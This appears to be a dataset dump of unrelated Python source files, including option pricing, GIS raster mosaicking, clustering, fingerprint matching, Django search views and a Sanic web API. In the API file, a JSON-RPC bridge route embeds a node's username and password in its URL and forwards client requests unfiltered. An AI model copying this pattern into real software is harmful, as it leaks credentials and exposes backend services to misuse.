self.btnShowPlateRecords.setText(_translate("MainWindow", "Plaka Kayıtlarını Göster"))
self.vehicle_plate.setTitle(_translate("MainWindow", "Araç/Plaka Görseli"))
self.startPlateRecognition.setText(_translate("MainWindow", "Plaka Okuma Başlat"))
self.openImageFile.setText(_translate("MainWindow", "Resim Dosyası Seç"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| EdaNurKaramuk/PlakaTanimaSistemi | CarPlateRecognitionSystem.py | CarPlateRecognitionSystem.py | py | 9,785 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui.QIcon",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui",
"line_number"... |
37724851331 | # -*- coding: utf-8 -*-
import numpy as np
import math
import matplotlib.pyplot as plt
def option_pricing(s0, k, t, sigma, r, cp, american=False, n = 100):
#cijena call opcije u T CT = max(ST-K, 0)
#cijena put opcije u T PT = max(K-ST, 0)
#s0 - pocetna cijena
#k - strajk cijena
#t - datum dospjeca
#v - volatility - promjenjivost -sigma
#rf - risk-free rate
#cp 1/-1 call/put
#american True/False American/European
#n - broj koraka binomnog stabla
#b = B - money market account
#jarrow-rudd algoritam za binomial tree
#ovi parametri se racunaju na razne nacine u ovisnosti od koristenja algoritma
#(CRR, jarrow-rudd, Tian...)
delta_t = t/n
#p = 0.5
u = math.exp((r-0.5*math.pow(sigma,2))*delta_t+sigma*math.sqrt(delta_t))
d = math.exp((r-0.5*math.pow(sigma,2))*delta_t-sigma*math.sqrt(delta_t))
b = math.exp(r*delta_t)
q = (b - d)/(u-d) #q = p* - risk neutral measure
st = np.zeros((n+1, n+1))
option_value = np.zeros((n+1, n+1))
st[0, 0] = s0
am_price = []
eu_price = []
for i in range(1, n+1):
st[i, 0] = st[i-1, 0]*u
for j in range(1, i+1):
st[i, j] = st[i-1, j-1]*d
#rekurzija
for j in range(n+1):
option_value[n, j] = max(0, cp*(st[n, j]-k)) #stavljanje maks. vrijednosti na kraj
for i in range(n-1, -1, -1):
for j in range(i+1): #European option
option_value[i, j] = (q*option_value[i+1, j]+(1-q)*option_value[i+1, j+1])/b
if american: #American option
option_value[i, j] = max(option_value[i, j], cp*(st[i, j]-k))
am_price.append(option_value[i, j]) #samo za potrebe plotanja
else:
eu_price.append(option_value[i, j]) #samo za potrebe plotanja
#plotanje grafika
tam = np.linspace(0, 1, len(am_price))
plt.plot(tam, am_price, 'bo')
teu = np.linspace(0, 1, len(eu_price))
plt.plot(teu, eu_price, 'ro')
plt.show()
return option_value[0,0]
V = option_pricing(100, 80, 1, 0.8, 0.01, -1, False, 10)
#V = option_pricing(100, 80, 1, 0.8, 0.01, -1, True, 100)
print(V) | aldinabu/ou | option_pricing_dp.py | option_pricing_dp.py | py | 2,225 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "math.exp",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.pow",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 29,
"us... |
35015230469 | import importlib
from sklearn.cluster import SpectralClustering
import clusters_optimizer_base as co
importlib.reload(co)
class SpectralClusterOptimizer(co.ClustersOptimizerBase):
# 100 initializations
def optimize(self, data):
obj = SpectralClustering(
n_clusters=self.num_clusters,
assign_labels='discretize',
random_state=self.seed,
n_init=100,
)
obj.fit(data)
return obj.labels_
| morganstanley/MSML | papers/Clustering_via_Dual_Divergence_Maximization/spectral_clusters_optimizer.py | spectral_clusters_optimizer.py | py | 494 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "importlib.reload",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "clusters_optimizer_base.ClustersOptimizerBase",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sklearn.cluster.SpectralClustering",
"line_number": 12,
"usage_type": "... |
24730881807 | from sklearn import tree
import numpy as np
X = np.array([[-1,-1],[-2,-1],[1,1],[2,1]])
y = np.array([1,1,2,2])
#
# X = [[0, 0], [1, 1]]
# Y = [0, 1]
clf = tree.DecisionTreeClassifier()
# clf = clf.fit(X, y)
clf = clf.fit(X, y)
print(clf)
print(clf.predict([[-0.8,-1]]))
print(clf.predict([[5,6]])) | 11city/tianchi | algorithm/DecisionTree/DecisionTreeTest.py | DecisionTreeTest.py | py | 304 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sklearn.tre... |
506670450 | """
Merge, combine and mosaic
"""
def rsts_to_mosaic(inRasterS, o, api="grass", fformat='.tif', method=None):
"""
Create Mosaic of Raster
"""
if api == 'pygrass':
"""
The GRASS program r.patch allows the user to build a new raster map the size
and resolution of the current region by assigning known data values from
input raster maps to the cells in this region. This is done by filling in
"no data" cells, those that do not yet contain data, contain NULL data, or,
optionally contain 0 data, with the data from the first input map.
Once this is done the remaining holes are filled in by the next input map,
and so on. This program is useful for making a composite raster map layer
from two or more adjacent map layers, for filling in "holes" in a raster map
layer's data (e.g., in digital elevation data), or for updating an older map
layer with more recent data. The current geographic region definition and
mask settings are respected.
The first name listed in the string input=name,name,name, ... is the name of
the first map whose data values will be used to fill in "no data" cells in
the current region. The second through last input name maps will be used,
in order, to supply data values for for the remaining "no data" cells.
"""
from grass.pygrass.modules import Module
m = Module(
"r.patch", input=inRasterS, output=o,
overwrite=True, run_=False, quiet=True
)
m()
elif api == 'grass':
from glass.pys import execmd
rcmd = execmd((
f"r.patch input={','.join(inRasterS)} output={o} "
"--overwrite --quiet"
))
elif api == 'rasterio':
import rasterio
from rasterio.merge import merge
from glass.prop.df import drv_name
from glass.prop.prj import get_epsg, epsg_to_wkt
if type(inRasterS) != list:
from glass.pys.oss import lst_ff
rsts = lst_ff(inRasterS, file_format=fformat)
else: rsts = inRasterS
methods = ['first', 'last', 'min', 'max']
method = 'first' if not method or \
method not in methods else method
srcs = [rasterio.open(r) for r in rsts]
mosaic, out_trans = merge(srcs, method=method)
out_meta = srcs[0].meta.copy()
out_meta.update({
"driver" : drv_name(o),
"height" : mosaic.shape[1],
"width" : mosaic.shape[2],
"transform" : out_trans,
"count" : 1,
"crs" : epsg_to_wkt(get_epsg(rsts[0])),
"compress" : 'lzw'
})
with rasterio.open(o, "w", **out_meta) as dest:
dest.write(mosaic)
else:
raise ValueError(f'api {api} is not available')
return o
def rseries(lst, out, meth, as_cmd=None):
"""
r.series - Makes each output cell value a function of the values
assigned to the corresponding cells in the input raster map layers.
Method Options:
average, count, median, mode, minimum, min_raster, maximum,
max_raster, stddev, range, sum, variance, diversity,
slope, offset, detcoeff, tvalue, quart1, quart3, perc90,
quantile, skewness, kurtosis
"""
if type(lst) != list:
raise ValueError("lst must be a list of rasters")
if not as_cmd:
from grass.pygrass.modules import Module
serie = Module(
'r.series', input=lst, output=out, method=meth,
overwrite=True, quiet=True, run_=False
)
serie()
else:
from glass.pys import execmd
ilst = ",".join(lst)
rcmd = execmd((
f"r.series input={ilst} output={out} "
f"method={meth} "
"--overwrite --quiet"
))
return out
def fullgrass_rseries(ifolder, refrst, method, orst):
"""
R. Series using grass
"""
import os
from glass.wenv.grs import run_grass
from glass.pys.tm import now_as_str
from glass.pys.oss import lst_ff, fprop
loc = now_as_str()
gbase = run_grass(ifolder, location=loc, srs=refrst)
import grass.script.setup as gsetup
gsetup.init(gbase, ifolder, loc, "PERMANENT")
from glass.it.rst import rst_to_grs, grs_to_rst
rsts = [rst_to_grs(
r, fprop(r, 'fn')
) for r in lst_ff(ifolder, file_format='.tif')]
prst = rseries(rsts, fprop(orst, 'fn'), method, as_cmd=True)
grs_to_rst(prst, orst)
return orst
def bnds_to_mosaic(bands, outdata, ref_raster, loc=None):
"""
Satellite image To mosaic
bands = {
'bnd_2' : [path_to_file, path_to_file],
'bnd_3' : [path_to_file, path_to_file],
'bnd_4' : [path_to_file, path_to_file],
}
"""
"""
Start GRASS GIS Session
"""
import os
from glass.pys.oss import fprop
from glass.prop.prj import rst_epsg
from glass.wenv.grs import run_grass
# Get EPSG from refRaster
epsg = rst_epsg(ref_raster, returnIsProj=None)
LOC = loc if loc else 'gr_loc'
grass_base = run_grass(
outdata, grassBIN='grass78',
location=LOC, srs=epsg
)
import grass.script.setup as gsetup
gsetup.init(grass_base, outdata, LOC, 'PERMANENT')
# ************************************************************************ #
# GRASS MODULES #
# ************************************************************************ #
from glass.it.rst import rst_to_grs, grs_to_rst
from glass.wenv.grs import rst_to_region
# ************************************************************************ #
# SET GRASS GIS LOCATION EXTENT #
# ************************************************************************ #
extRst = rst_to_grs(ref_raster, 'extent_raster')
rst_to_region(extRst)
# ************************************************************************ #
# SEND DATA TO GRASS GIS #
# ************************************************************************ #
grs_bnds = {}
for bnd in bands:
l= []
for b in bands[bnd]:
bb = rst_to_grs(b, fprop(b, 'fn'))
l.append(bb)
grs_bnds[bnd] = l
# ************************************************************************ #
# PATCH bands and export #
# ************************************************************************ #
for bnd in grs_bnds:
mosaic_band = rseries(grs_bnds[bnd], bnd, 'maximum')
grs_bnds[bnd] = grs_to_rst(mosaic_band, os.path.join(
outdata, mosaic_band + '.tif'
), as_cmd=True)
return grs_bnds
| jasp382/glass | glass/rst/mos.py | mos.py | py | 6,840 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "grass.pygrass.modules.Module",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "glass.pys.execmd",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "glass.pys.oss.lst_ff",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "ra... |
17602594229 | from functools import wraps
import json
import os
import requests
import boto3
from sanic import Sanic, response
from sanic.exceptions import NotFound
from sanic.log import LOGGING_CONFIG_DEFAULTS
from sanic_cors import CORS
from sanic_limiter import Limiter, get_remote_address, RateLimitExceeded
from botocore.exceptions import ClientError
from sanic_prometheus import monitor
from erebor.errors import (error_response, UNAUTHORIZED,
INVALID_API_KEY,
RATE_LIMIT_EXCEEDED, ROUTE_NOT_FOUND)
from erebor.logs import logging_config
from erebor.sql import USER_ID_SQL
app = Sanic(log_config=logging_config
if not os.getenv('erebor_test') else LOGGING_CONFIG_DEFAULTS)
CORS(app, automatic_options=True)
limiter = Limiter(app,
global_limits=['50 per minute'],
key_func=get_remote_address)
def authorized():
def decorator(f):
@wraps(f)
async def decorated_function(request, *args, **kwargs):
db = request.app.pg
cookie = request.cookies.get('session_id')
if cookie:
user_ids = await db.fetchrow(USER_ID_SQL, cookie)
if user_ids is not None:
request['db'] = request.app.pg
request['session'] = {'user_id': user_ids['user_id'],
'user_uid': user_ids['user_uid'],
'channel': user_ids['channel'],
'session_id': cookie}
res = await f(request, *args, **kwargs)
return res
else:
error_response([INVALID_API_KEY])
return error_response([UNAUTHORIZED])
return decorated_function
return decorator
@app.exception(RateLimitExceeded)
def handle_429(request, exception):
return error_response([RATE_LIMIT_EXCEEDED])
@app.exception(NotFound)
def handle_404(request, exception):
return error_response([ROUTE_NOT_FOUND])
# REMOVE
@app.route('/jsonrpc', methods=['POST'])
@authorized()
async def json_rpc_bridge(request):
url = "http://hoard:bombadil@shenron.hoardinvest.com:8332"
headers = {'content-type': 'application/json'}
payload = request.json
rpc_response = requests.post(
url, data=json.dumps(payload), headers=headers)
return response.json(rpc_response.json())
def load_aws_secret(secret_name):
secret = None
endpoint_url = "https://secretsmanager.us-east-2.amazonaws.com"
region_name = "us-east-2"
session = boto3.session.Session()
client = session.client(
service_name='secretsmanager',
region_name=region_name,
endpoint_url=endpoint_url
)
try:
get_secret_value_response = client.get_secret_value(
SecretId=secret_name
)
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
print("The requested secret " + secret_name + " was not found")
elif e.response['Error']['Code'] == 'InvalidRequestException':
print("The request was invalid due to:", e)
elif e.response['Error']['Code'] == 'InvalidParameterException':
print("The request had invalid params:", e)
else:
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
return json.loads(secret)
if __name__ == '__main__':
secret_name = os.environ['EREBOR_DB_AWS_SECRET']
if secret_name:
from erebor.db import db_bp
secret = load_aws_secret(secret_name)
app.db = dict(database=secret['dbname'],
user=secret['username'],
password=secret['password'],
host=secret['host'],
port=secret['port'])
app.blueprint(db_bp)
else:
raise Exception("Missing database credentials")
from erebor.api.users import users_bp
from erebor.api.transactions import transactions_bp
from erebor.api.support import support_bp
from erebor.api.misc import misc_bp
from erebor.api.prices import prices_bp
app.blueprint(users_bp)
app.blueprint(transactions_bp)
app.blueprint(support_bp)
app.blueprint(misc_bp)
app.blueprint(prices_bp)
monitor(app).expose_endpoint()
app.run(host='0.0.0.0',
port=8000,
access_log=False if os.environ.get('EREBOR_ENV') == 'PROD'
else True)
| MichaelHDesigns/erebor | erebor/erebor.py | erebor.py | py | 4,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sanic.Sanic",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "erebor.logs.logging_config",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "sanic.log.LOGGING_CO... |
35132638275 | import numpy as np
import gin.tf
@gin.configurable(whitelist=["use_entities_order"])
class ExistingEdgesFilter(object):
def __init__(self, entities_count, graph_edges, use_entities_order=True):
self.entities_count = entities_count
self.set_of_graph_edges = set(graph_edges)
self.use_entities_order = use_entities_order
def get_values_corresponding_to_existing_edges(self, edge_ids, mask_index, values):
output_index = edge_ids[mask_index]
candidate_edges = np.tile(edge_ids, (self.entities_count, 1))
candidate_edges[:, mask_index] = np.arange(self.entities_count, dtype=np.int32)
if self.use_entities_order:
edges_to_keep_indexes = [
index for index, edge_ids in enumerate(candidate_edges)
if tuple(edge_ids) not in self.set_of_graph_edges or index == output_index
]
filtered_edges = candidate_edges[edges_to_keep_indexes]
target_index = np.where((filtered_edges == edge_ids).all(axis=1))[0][0]
return values[edges_to_keep_indexes], target_index
edges_to_keep_indexes = [
index for index, edge_ids in enumerate(candidate_edges)
if tuple(edge_ids) not in self.set_of_graph_edges and index != output_index
]
filtered_values = np.concatenate((values[edges_to_keep_indexes], [values[output_index]]))
target_index = np.random.randint(len(filtered_values))
filtered_values[-1], filtered_values[target_index] = filtered_values[target_index], filtered_values[-1]
return filtered_values, target_index
| Dawidsoni/relation-embeddings | src/optimization/existing_edges_filter.py | existing_edges_filter.py | py | 1,625 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.tile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.int32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "numpy.where",
"line_numb... |
10501857645 | import os
from aiohttp import Fingerprint
import cv2
from matplotlib import pyplot as plt
from Matcher import *
from random import *
# Authentication class will serve as an authenticator for one person
class Authentication:
def __init__(self, probe_img, data_path, folder, threshold=0.6):
self.probe_img = probe_img # Probe_image_description
self.genuine_scores = [] # genuine score list
self.impostor_scores = [] # Imposter score list
self.authentication_database = [] # random authentication data_base
self.data_path = data_path # "Dataset"
self.folder = folder # "Probe"
self.match_dictionary = {} # dictionary that stores the matches as values and corresponding images that matched as keys
self.threshold = threshold # Threshold value that you want to compare when deciding genuine or imposter
def create_random_authentication_database(self) -> None:
"""
objective: Creates a random list of images from real folder so that we can have a sort of
database for authentication
process: Randomly picks 5 images from the Real folder and appends it to
self.authentication_database list
input: None
output: changes the self.authentication_database list
"""
real_img_path = os.path.join(self.data_path, "Real")
real_img_file_names = os.listdir(real_img_path)
for i in range(0, 5):
random_idx_for_real_img = randint(0, len(real_img_file_names) - 1)
random_real_img = real_img_file_names[random_idx_for_real_img]
self.authentication_database.append(random_real_img)
def create_match_dict(self) -> None:
"""
objective: Creates a dictionary where the key is the image name and the value is the match score
process: computing the match score with every image in the database that the user formed when they
call the function create_random_authentication_database
input: None
output: changes the self.match_dictionary
"""
probe_img_info_list = self.probe_img.split("_")
probe_img_folder = probe_img_info_list[0]
database_path = os.path.join(self.data_path, 'Real')
probe_path = os.path.join(self.data_path, self.folder, probe_img_folder, self.probe_img)
real_image_descriptions = os.listdir(database_path)
probe_image = cv2.imread(probe_path)
for image_description in self.authentication_database:
authentication_database_image_path = os.path.join(database_path, image_description)
real_image = cv2.imread(authentication_database_image_path)
M = Matcher(real_image, probe_image)
match_score = M.get_sift_flann_match_score()
print_description = image_description
self.match_dictionary[print_description] = match_score
sorted_match_dict = sorted(self.match_dictionary.items(), key=lambda x: x[1])
def get_prediction(self) -> int:
"""
objective: to return whether a correct or incorrect match
process: gets the score of the image and if the match score is greater than the self.threshold
then we append it to the self.genuine_scores, otherwise we append it to self.impostor_scores
input: None
output: a dictionary with the filename and corresponding match scores
"""
sorted_match_dict = sorted(self.match_dictionary.items(), key=lambda x: x[1])
if sorted_match_dict[-1][1] / 100 > self.threshold:
print('Access Granted')
self.genuine_scores.append(sorted_match_dict[-1][1] / 100)
return 1
else:
self.impostor_scores.append(sorted_match_dict[-1][1] / 100)
# print('Access Denied')
return 0
| Dorukozar/Fingerprint-Matcher-and-Evaluation | Authentication.py | Authentication.py | py | 3,865 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number"... |
6562172415 | from django.shortcuts import render,redirect
from .models import *
from django.contrib.auth import login, authenticate, logout
from django.contrib import messages
from django.db.models import Q
# Create your views here.
def login_page(request):
return render(request, "index.html")
def init_login(request):
username = request.POST.get("username", None)
password = request.POST.get("password", None)
user = authenticate(request, username = username, password = password)
if user is not None:
login(request, user)
return redirect("searchapp:search")
else:
messages.error(request, "Invalid Login Credentials")
return redirect("searchapp:login")
def search_bar(request):
fullname = request.POST.get("fullname", None)
school = request.POST.get("school", None)
grad_year = request.POST.get("grad_year" , None)
if fullname and school and grad_year:
student = Student.objects.filter(Q(fullname = fullname) & Q(school__name = school) & Q(year_of_grad = grad_year))
context = {"student":student}
elif fullname and school:
student = Student.objects.filter(Q(fullname = fullname) & Q(school__name = school))
context = {"student":student}
elif fullname and grad_year:
student = Student.objects.filter(Q(fullname = fullname) & Q(year_of_grad = grad_year))
context = {"student":student}
elif school and grad_year:
student = Student.objects.filter(Q(school__name = school) & Q(year_of_grad = grad_year))
context = {"student":student}
elif fullname:
student = Student.objects.filter(Q(fullname = fullname))
context = {"student":student}
elif school:
student = Student.objects.filter(Q(school__name = school))
context = {"student":student}
elif grad_year:
student = Student.objects.filter(Q(year_of_grad = grad_year))
context = {"student":student}
else:
student = ""
context = {"student":student}
return render(request, "searchbar.html", context)
def logout_view(request):
logout(request)
return redirect("searchapp:sign-in")
| Ennyola/Search-System | searchSystem/searchApp/views.py | views.py | py | 2,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.authenticate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.login",
"line_number": 17,
"usage_type": "call"
},
{
... |
43160456317 | import numpy as np
import matplotlib.pyplot as plt
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# 01. 기본 sigmoid
x = np.arange(-5., 5., 0.1)
y = sigmoid(x)
plt.figure(0)
plt.plot(x, y, 'g')
plt.plot([0,0],[1.,0.], ':')
plt.title('sigmoid func')
# plt.show()
# 02.sigmoid (ax)
# a가 클수록 step function에 가까워진다.
y1 = sigmoid(0.5 * x)
y2 = sigmoid(x)
y3 = sigmoid(2 * x)
plt.figure(1)
plt.plot(x, y1, 'r')
plt.plot(x, y2, 'g')
plt.plot(x, y3, 'b')
plt.title('sigmoid func')
# plt.show()
# 03.sigmoid (b)
# b가 클수록 더 위로 올라간다.
y1 = sigmoid(x)
y2 = sigmoid(x + 1)
y3 = sigmoid(x + 2)
plt.figure(2)
plt.plot(x, y1, 'r')
plt.plot(x, y2, 'g')
plt.plot(x, y3, 'b')
plt.title('sigmoid func')
plt.show() | minssoj/Learning_Pytorch | day2/01.sigmoidFunctionEX.py | 01.sigmoidFunctionEX.py | py | 741 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.exp",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.